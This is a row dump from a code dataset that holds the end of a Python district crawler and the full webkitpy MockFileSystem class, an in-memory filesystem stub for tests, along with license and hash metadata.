return map(lambda x: (x['CODE'], x['NAME']), list_)
def url_list(self, city_code):
return self.url_list_base + str(city_code)
def crawl(self):
# ์ง์ญ๊ตฌ ๋ํ
jobs = []
for city_code, city_name in self.city_codes():
req_url = self.url_list(city_code)
job = gevent.spawn(self.parse, req_url, city_name)
jobs.append(job)
gevent.joinall(jobs)
people = flatten(job.get() for job in jobs)
# ๋น๋ก๋ํ
if hasattr(self, 'prop_crawler'):
prop_people = self.prop_crawler.crawl()
for person in prop_people:
person['district'] = '๋น๋ก๋ํ'
people.extend(prop_people)
return people
class SinglePageCrawler(BaseCrawler):
def crawl(self):
people = self.parse(self.url_list)
return people
| agpl-3.0 | -7,241,243,713,288,136,000 | 31.229358 | 88 | 0.59351 | false |
axinging/sky_engine | sky/tools/webkitpy/common/system/filesystem_mock.py | 11 | 16806 | # Copyright (C) 2009 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import StringIO
import errno
import hashlib
import os
import re
from webkitpy.common.system import path
class MockFileSystem(object):
sep = '/'
pardir = '..'
def __init__(self, files=None, dirs=None, cwd='/'):
"""Initializes a "mock" filesystem that can be used to completely
stub out a filesystem.
Args:
files: a dict of filenames -> file contents. A file contents
value of None is used to indicate that the file should
not exist.
"""
self.files = files or {}
self.written_files = {}
self.last_tmpdir = None
self.current_tmpno = 0
self.cwd = cwd
self.dirs = set(dirs or [])
self.dirs.add(cwd)
for f in self.files:
d = self.dirname(f)
while not d in self.dirs:
self.dirs.add(d)
d = self.dirname(d)
def clear_written_files(self):
# This function can be used to track what is written between steps in a test.
self.written_files = {}
def _raise_not_found(self, path):
raise IOError(errno.ENOENT, path, os.strerror(errno.ENOENT))
def _split(self, path):
# This is not quite a full implementation of os.path.split
# http://docs.python.org/library/os.path.html#os.path.split
if self.sep in path:
return path.rsplit(self.sep, 1)
return ('', path)
def abspath(self, path):
if os.path.isabs(path):
return self.normpath(path)
return self.abspath(self.join(self.cwd, path))
def realpath(self, path):
return self.abspath(path)
def basename(self, path):
return self._split(path)[1]
def expanduser(self, path):
if path[0] != "~":
return path
parts = path.split(self.sep, 1)
home_directory = self.sep + "Users" + self.sep + "mock"
if len(parts) == 1:
return home_directory
return home_directory + self.sep + parts[1]
def path_to_module(self, module_name):
return "/mock-checkout/third_party/WebKit/tools/" + module_name.replace('.', '/') + ".py"
def chdir(self, path):
path = self.normpath(path)
if not self.isdir(path):
raise OSError(errno.ENOENT, path, os.strerror(errno.ENOENT))
self.cwd = path
def copyfile(self, source, destination):
if not self.exists(source):
self._raise_not_found(source)
if self.isdir(source):
raise IOError(errno.EISDIR, source, os.strerror(errno.EISDIR))
if self.isdir(destination):
raise IOError(errno.EISDIR, destination, os.strerror(errno.EISDIR))
if not self.exists(self.dirname(destination)):
raise IOError(errno.ENOENT, destination, os.strerror(errno.ENOENT))
self.files[destination] = self.files[source]
self.written_files[destination] = self.files[source]
def dirname(self, path):
return self._split(path)[0]
def exists(self, path):
return self.isfile(path) or self.isdir(path)
def files_under(self, path, dirs_to_skip=[], file_filter=None):
def filter_all(fs, dirpath, basename):
return True
file_filter = file_filter or filter_all
files = []
if self.isfile(path):
if file_filter(self, self.dirname(path), self.basename(path)) and self.files[path] is not None:
files.append(path)
return files
if self.basename(path) in dirs_to_skip:
return []
if not path.endswith(self.sep):
path += self.sep
dir_substrings = [self.sep + d + self.sep for d in dirs_to_skip]
for filename in self.files:
if not filename.startswith(path):
continue
suffix = filename[len(path) - 1:]
if any(dir_substring in suffix for dir_substring in dir_substrings):
continue
dirpath, basename = self._split(filename)
if file_filter(self, dirpath, basename) and self.files[filename] is not None:
files.append(filename)
return files
def getcwd(self):
return self.cwd
def glob(self, glob_string):
# FIXME: This handles '*', but not '?', '[', or ']'.
glob_string = re.escape(glob_string)
glob_string = glob_string.replace('\\*', '[^\\/]*') + '$'
glob_string = glob_string.replace('\\/', '/')
path_filter = lambda path: re.match(glob_string, path)
# We could use fnmatch.fnmatch, but that might not do the right thing on windows.
existing_files = [path for path, contents in self.files.items() if contents is not None]
return filter(path_filter, existing_files) + filter(path_filter, self.dirs)
def isabs(self, path):
return path.startswith(self.sep)
def isfile(self, path):
return path in self.files and self.files[path] is not None
def isdir(self, path):
return self.normpath(path) in self.dirs
def _slow_but_correct_join(self, *comps):
return re.sub(re.escape(os.path.sep), self.sep, os.path.join(*comps))
def join(self, *comps):
# This function is called a lot, so we optimize it; there are
# unittests to check that we match _slow_but_correct_join(), above.
path = ''
sep = self.sep
for comp in comps:
if not comp:
continue
if comp[0] == sep:
path = comp
continue
if path:
path += sep
path += comp
if comps[-1] == '' and path:
path += '/'
path = path.replace(sep + sep, sep)
return path
def listdir(self, path):
root, dirs, files = list(self.walk(path))[0]
return dirs + files
def walk(self, top):
sep = self.sep
if not self.isdir(top):
raise OSError("%s is not a directory" % top)
if not top.endswith(sep):
top += sep
dirs = []
files = []
for f in self.files:
if self.exists(f) and f.startswith(top):
remaining = f[len(top):]
if sep in remaining:
dir = remaining[:remaining.index(sep)]
if not dir in dirs:
dirs.append(dir)
else:
files.append(remaining)
return [(top[:-1], dirs, files)]
def mtime(self, path):
if self.exists(path):
return 0
self._raise_not_found(path)
def _mktemp(self, suffix='', prefix='tmp', dir=None, **kwargs):
if dir is None:
dir = self.sep + '__im_tmp'
curno = self.current_tmpno
self.current_tmpno += 1
self.last_tmpdir = self.join(dir, '%s_%u_%s' % (prefix, curno, suffix))
return self.last_tmpdir
def mkdtemp(self, **kwargs):
class TemporaryDirectory(object):
def __init__(self, fs, **kwargs):
self._kwargs = kwargs
self._filesystem = fs
self._directory_path = fs._mktemp(**kwargs)
fs.maybe_make_directory(self._directory_path)
def __str__(self):
return self._directory_path
def __enter__(self):
return self._directory_path
def __exit__(self, type, value, traceback):
# Only self-delete if necessary.
# FIXME: Should we delete non-empty directories?
if self._filesystem.exists(self._directory_path):
self._filesystem.rmtree(self._directory_path)
return TemporaryDirectory(fs=self, **kwargs)
def maybe_make_directory(self, *path):
norm_path = self.normpath(self.join(*path))
while norm_path and not self.isdir(norm_path):
self.dirs.add(norm_path)
norm_path = self.dirname(norm_path)
def move(self, source, destination):
if not self.exists(source):
self._raise_not_found(source)
if self.isfile(source):
self.files[destination] = self.files[source]
self.written_files[destination] = self.files[destination]
self.files[source] = None
self.written_files[source] = None
return
self.copytree(source, destination)
self.rmtree(source)
def _slow_but_correct_normpath(self, path):
return re.sub(re.escape(os.path.sep), self.sep, os.path.normpath(path))
def normpath(self, path):
# This function is called a lot, so we try to optimize the common cases
# instead of always calling _slow_but_correct_normpath(), above.
if '..' in path or '/./' in path:
# This doesn't happen very often; don't bother trying to optimize it.
return self._slow_but_correct_normpath(path)
if not path:
return '.'
if path == '/':
return path
if path == '/.':
return '/'
if path.endswith('/.'):
return path[:-2]
if path.endswith('/'):
return path[:-1]
return path
def open_binary_tempfile(self, suffix=''):
path = self._mktemp(suffix)
return (WritableBinaryFileObject(self, path), path)
def open_binary_file_for_reading(self, path):
if self.files[path] is None:
self._raise_not_found(path)
return ReadableBinaryFileObject(self, path, self.files[path])
def read_binary_file(self, path):
# Intentionally raises KeyError if we don't recognize the path.
if self.files[path] is None:
self._raise_not_found(path)
return self.files[path]
def write_binary_file(self, path, contents):
# FIXME: should this assert if dirname(path) doesn't exist?
self.maybe_make_directory(self.dirname(path))
self.files[path] = contents
self.written_files[path] = contents
def open_text_file_for_reading(self, path):
if self.files[path] is None:
self._raise_not_found(path)
return ReadableTextFileObject(self, path, self.files[path])
def open_text_file_for_writing(self, path):
return WritableTextFileObject(self, path)
def read_text_file(self, path):
return self.read_binary_file(path).decode('utf-8')
def write_text_file(self, path, contents):
return self.write_binary_file(path, contents.encode('utf-8'))
def sha1(self, path):
contents = self.read_binary_file(path)
return hashlib.sha1(contents).hexdigest()
def relpath(self, path, start='.'):
# Since os.path.relpath() calls os.path.normpath()
# (see http://docs.python.org/library/os.path.html#os.path.abspath )
# it also removes trailing slashes and converts forward and backward
# slashes to the preferred slash os.sep.
start = self.abspath(start)
path = self.abspath(path)
common_root = start
dot_dot = ''
while not common_root == '':
if path.startswith(common_root):
break
common_root = self.dirname(common_root)
dot_dot += '..' + self.sep
rel_path = path[len(common_root):]
if not rel_path:
return '.'
if rel_path[0] == self.sep:
# It is probably sufficient to remove just the first character
# since os.path.normpath() collapses separators, but we use
# lstrip() just to be sure.
rel_path = rel_path.lstrip(self.sep)
elif not common_root == '/':
# We are in the case typified by the following example:
# path = "/tmp/foobar", start = "/tmp/foo" -> rel_path = "bar"
common_root = self.dirname(common_root)
dot_dot += '..' + self.sep
rel_path = path[len(common_root) + 1:]
return dot_dot + rel_path
def remove(self, path):
if self.files[path] is None:
self._raise_not_found(path)
self.files[path] = None
self.written_files[path] = None
def rmtree(self, path):
path = self.normpath(path)
for f in self.files:
# We need to add a trailing separator to path to avoid matching
# cases like path='/foo/b' and f='/foo/bar/baz'.
if f == path or f.startswith(path + self.sep):
self.files[f] = None
self.dirs = set(filter(lambda d: not (d == path or d.startswith(path + self.sep)), self.dirs))
def copytree(self, source, destination):
source = self.normpath(source)
destination = self.normpath(destination)
for source_file in list(self.files):
if source_file.startswith(source):
destination_path = self.join(destination, self.relpath(source_file, source))
self.maybe_make_directory(self.dirname(destination_path))
self.files[destination_path] = self.files[source_file]
def split(self, path):
idx = path.rfind(self.sep)
if idx == -1:
return ('', path)
return (path[:idx], path[(idx + 1):])
def splitext(self, path):
idx = path.rfind('.')
if idx == -1:
idx = len(path)
return (path[0:idx], path[idx:])
class WritableBinaryFileObject(object):
def __init__(self, fs, path):
self.fs = fs
self.path = path
self.closed = False
self.fs.files[path] = ""
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def close(self):
self.closed = True
def write(self, str):
self.fs.files[self.path] += str
self.fs.written_files[self.path] = self.fs.files[self.path]
class WritableTextFileObject(WritableBinaryFileObject):
def write(self, str):
WritableBinaryFileObject.write(self, str.encode('utf-8'))
class ReadableBinaryFileObject(object):
def __init__(self, fs, path, data):
self.fs = fs
self.path = path
self.closed = False
self.data = data
self.offset = 0
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def close(self):
self.closed = True
def read(self, bytes=None):
if not bytes:
return self.data[self.offset:]
start = self.offset
self.offset += bytes
return self.data[start:self.offset]
class ReadableTextFileObject(ReadableBinaryFileObject):
def __init__(self, fs, path, data):
super(ReadableTextFileObject, self).__init__(fs, path, StringIO.StringIO(data.decode("utf-8")))
def close(self):
self.data.close()
super(ReadableTextFileObject, self).close()
def read(self, bytes=-1):
return self.data.read(bytes)
def readline(self, length=None):
return self.data.readline(length)
def __iter__(self):
return self.data.__iter__()
def next(self):
return self.data.next()
def seek(self, offset, whence=os.SEEK_SET):
self.data.seek(offset, whence)
| bsd-3-clause | 3,958,192,683,675,603,000 | 33.368098 | 107 | 0.590444 | false |
Subsets and Splits